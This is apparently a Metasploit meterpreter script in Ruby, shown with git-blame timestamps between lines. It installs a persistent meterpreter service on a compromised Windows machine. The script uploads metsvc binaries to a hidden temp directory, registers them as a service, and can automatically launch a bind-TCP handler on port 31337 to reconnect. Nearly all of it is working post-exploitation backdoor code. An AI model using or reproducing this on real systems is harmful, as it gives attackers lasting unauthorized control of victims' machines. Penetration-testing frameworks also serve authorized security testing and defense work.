2014-09-16 21:41:14 +00:00
|
|
|
##
|
|
|
|
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
|
|
|
|
# If you'd like to imporve this script, please try to port it as a post
|
|
|
|
# module instead. Thank you.
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
|
2009-10-20 19:36:19 +00:00
|
|
|
#
|
|
|
|
# Meterpreter script for installing the meterpreter service
|
|
|
|
#
|
|
|
|
|
|
|
|
session = client
|
|
|
|
|
|
|
|
#
|
|
|
|
# Options
|
|
|
|
#
|
|
|
|
opts = Rex::Parser::Arguments.new(
|
2013-09-30 18:47:53 +00:00
|
|
|
"-h" => [ false, "This help menu"],
|
|
|
|
"-r" => [ false, "Uninstall an existing Meterpreter service (files must be deleted manually)"],
|
2015-06-12 20:23:51 +00:00
|
|
|
"-A" => [ false, "Automatically start a matching exploit/multi/handler to connect to the service"]
|
2009-10-20 19:36:19 +00:00
|
|
|
)
|
|
|
|
|
|
|
|
# Exec a command and return the results
|
|
|
|
def m_exec(session, cmd)
|
2013-09-30 18:47:53 +00:00
|
|
|
r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
|
|
|
|
b = ""
|
|
|
|
while(d = r.channel.read)
|
|
|
|
b << d
|
|
|
|
end
|
|
|
|
r.channel.close
|
|
|
|
r.close
|
|
|
|
b
|
2009-10-20 19:36:19 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Default parameters
|
|
|
|
#
|
|
|
|
|
2013-09-26 19:34:48 +00:00
|
|
|
based = File.join(Msf::Config.data_directory, "meterpreter")
|
2009-10-20 19:36:19 +00:00
|
|
|
rport = 31337
|
|
|
|
install = false
|
|
|
|
autoconn = false
|
|
|
|
remove = false
|
2010-09-09 16:09:27 +00:00
|
|
|
if client.platform =~ /win32|win64/
|
|
|
|
|
2013-09-30 18:47:53 +00:00
|
|
|
#
|
|
|
|
# Option parsing
|
|
|
|
#
|
|
|
|
opts.parse(args) do |opt, idx, val|
|
|
|
|
case opt
|
|
|
|
when "-h"
|
|
|
|
print_line(opts.usage)
|
|
|
|
raise Rex::Script::Completed
|
|
|
|
when "-A"
|
|
|
|
autoconn = true
|
|
|
|
when "-r"
|
|
|
|
remove = true
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Create the persistent VBS
|
|
|
|
#
|
|
|
|
|
|
|
|
if(not remove)
|
|
|
|
print_status("Creating a meterpreter service on port #{rport}")
|
|
|
|
else
|
|
|
|
print_status("Removing the existing Meterpreter service")
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Upload to the filesystem
|
|
|
|
#
|
|
|
|
|
|
|
|
tempdir = client.fs.file.expand_path("%TEMP%") + "\\" + Rex::Text.rand_text_alpha(rand(8)+8)
|
|
|
|
|
|
|
|
print_status("Creating a temporary installation directory #{tempdir}...")
|
|
|
|
client.fs.dir.mkdir(tempdir)
|
|
|
|
|
2013-11-28 01:48:11 +00:00
|
|
|
# Use an array of `from -> to` associations so that things
|
|
|
|
# such as metsrv can be copied from the appropriate location
|
|
|
|
# but named correctly on the target.
|
|
|
|
bins = {
|
|
|
|
'metsrv.x86.dll' => 'metsrv.dll',
|
|
|
|
'metsvc-server.exe' => nil,
|
|
|
|
'metsvc.exe' => nil
|
|
|
|
}
|
|
|
|
|
|
|
|
bins.each do |from, to|
|
|
|
|
next if (from != "metsvc.exe" and remove)
|
|
|
|
to ||= from
|
|
|
|
print_status(" >> Uploading #{from}...")
|
|
|
|
fd = client.fs.file.new(tempdir + "\\" + to, "wb")
|
2015-04-28 19:04:37 +00:00
|
|
|
path = (from == 'metsrv.x86.dll') ? MetasploitPayloads.meterpreter_path('metsrv','x86.dll') : File.join(based, from)
|
2014-12-29 17:20:13 +00:00
|
|
|
fd.write(::File.read(path, ::File.size(path)))
|
2013-09-30 18:47:53 +00:00
|
|
|
fd.close
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Execute the agent
|
|
|
|
#
|
|
|
|
if(not remove)
|
|
|
|
print_status("Starting the service...")
|
|
|
|
client.fs.dir.chdir(tempdir)
|
|
|
|
data = m_exec(client, "metsvc.exe install-service")
|
|
|
|
print_line("\t#{data}")
|
|
|
|
else
|
|
|
|
print_status("Stopping the service...")
|
|
|
|
client.fs.dir.chdir(tempdir)
|
|
|
|
data = m_exec(client, "metsvc.exe remove-service")
|
|
|
|
print_line("\t#{data}")
|
|
|
|
end
|
|
|
|
|
|
|
|
if(remove)
|
|
|
|
m_exec(client, "cmd.exe /c del metsvc.exe")
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
2015-06-12 20:23:51 +00:00
|
|
|
# Setup the exploit/multi/handler if requested
|
2013-09-30 18:47:53 +00:00
|
|
|
#
|
|
|
|
if(autoconn)
|
|
|
|
print_status("Trying to connect to the Meterpreter service at #{client.session_host}:#{rport}...")
|
|
|
|
mul = client.framework.exploits.create("multi/handler")
|
|
|
|
mul.datastore['WORKSPACE'] = client.workspace
|
|
|
|
mul.datastore['PAYLOAD'] = "windows/metsvc_bind_tcp"
|
|
|
|
mul.datastore['LPORT'] = rport
|
|
|
|
mul.datastore['RHOST'] = client.session_host
|
|
|
|
mul.datastore['ExitOnSession'] = false
|
|
|
|
mul.exploit_simple(
|
|
|
|
'Payload' => mul.datastore['PAYLOAD'],
|
|
|
|
'RunAsJob' => true
|
|
|
|
)
|
|
|
|
end
|
2009-10-20 19:36:19 +00:00
|
|
|
|
2010-09-09 16:09:27 +00:00
|
|
|
else
|
2013-09-30 18:47:53 +00:00
|
|
|
print_error("This version of Meterpreter is not supported with this Script!")
|
|
|
|
raise Rex::Script::Completed
|
2012-02-29 01:28:47 +00:00
|
|
|
end
|